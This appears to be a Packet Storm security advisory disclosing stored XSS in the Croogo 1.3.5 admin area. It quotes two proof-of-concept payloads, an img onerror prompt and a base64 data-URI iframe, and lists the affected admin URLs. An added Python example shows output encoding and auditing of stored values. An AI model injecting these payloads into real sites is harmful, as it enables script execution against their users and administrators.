Croogo 1.3.5 Cross Site Scripting

2013-06-05T00:00:00
ID PACKETSTORM:121910
Type packetstorm
Reporter Nikhalesh Singh Bhadoria
Modified 2013-06-05T00:00:00

Description

                                        
                                            ` Exploit Title: Croogo Cms Multiple Cross Site Scripting Vulnerabilities  
# Date: 06/04/2013  
# Author: Nikhalesh Singh Bhadoria  
# Twitter: @nikhaleshsingh  
# Download Link: http://www.croogo.org/  
# Versions Affected: Croogo 1.3.5  
# Category: XSS  
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------  
  
Description:  
  
Input submitted in the admin area's contact options and in several other places is not sanitized. Because the unsanitized input  
is stored and later rendered, this results in stored cross-site scripting.  
  
POC:  
http://www.youtube.com/watch?v=gyt4-0ekalc&feature=youtu.be  
  
Code :-  
########################################################################################################  
"><img src=x onerror=prompt(0);>  
  
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">  
  
http://demo.xxx.com/admin/nodes/add/blog  
  
http://demo.xxx.com/admin/vocabularies  
  
http://demo.xxx.com/admin/contacts  
  
##########################################################################################################  
Fix:  
Better sanitization by restricting special characters.  
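
The following is an added illustration, not code from the advisory or from the Croogo project, of the two defensive steps implied by the fix above: output-encoding every stored value before it reaches the page, and auditing already-stored values for markup that should never have been accepted. The field names and the stored values are constructed for the example (modelled on the payloads quoted above); they are assumptions, not data from a Croogo installation.

```python
import html
import re

# Constructed sample of values as they might sit in the database after the
# unsanitized admin forms accepted them. Field names are assumptions.
STORED_FIELDS = {
    "contact_title": 'Sales "><img src=x onerror=prompt(0);>',
    "vocabulary_name": '<iframe/src="data:text/html;\tbase64\t,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">',
    "node_title": "Plain blog title",
}


def encode_for_html(value: str) -> str:
    """Output-encode a stored value for an HTML text or attribute context.

    html.escape with quote=True encodes & < > " and ', so whatever was stored
    is rendered as literal text instead of being parsed as markup. This is
    the step that neutralises stored XSS regardless of what got past input
    filtering.
    """
    return html.escape(value, quote=True)


# Heuristic patterns for reviewing stored content. \s covers the tab
# characters used inside the iframe payload's data: URI; browsers tolerate
# that whitespace, so the check has to as well.
_SUSPECT = re.compile(
    r"<\s*/?\s*[a-z]"              # any tag opener, including <iframe/src
    r"|\bon[a-z]+\s*="             # inline event handler such as onerror=
    r"|data\s*:\s*text\s*/\s*html",  # data: URI that delivers HTML
    re.IGNORECASE,
)


def find_suspect_fields(fields: dict) -> list:
    """Return the names of fields whose stored value contains markup that
    should have been rejected or encoded. Intended for auditing existing
    records after patching, since output encoding alone does not remove
    payloads already in the database."""
    return [name for name, value in fields.items() if _SUSPECT.search(value)]


def render_rows(fields: dict) -> str:
    """Build the table rows an admin listing would emit, encoding every
    value. Only the markup written here is parsed as HTML; stored content
    is always text."""
    return "".join(
        f"<tr><td>{encode_for_html(name)}</td><td>{encode_for_html(value)}</td></tr>"
        for name, value in fields.items()
    )


if __name__ == "__main__":
    print("Fields needing review:", find_suspect_fields(STORED_FIELDS))
    print(render_rows(STORED_FIELDS))
```

The rendering side is the part that actually closes the hole: restricting special characters on input helps, but any value that reaches a template without encoding is still executable. In a CakePHP-based application such as Croogo the equivalent of `encode_for_html` is applying the `h()` helper to every value echoed in a view.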
  
Regards,  
Nikhalesh Singh Bhadoria  
Information Security Enthusiast  
Website: Gurunsb.com  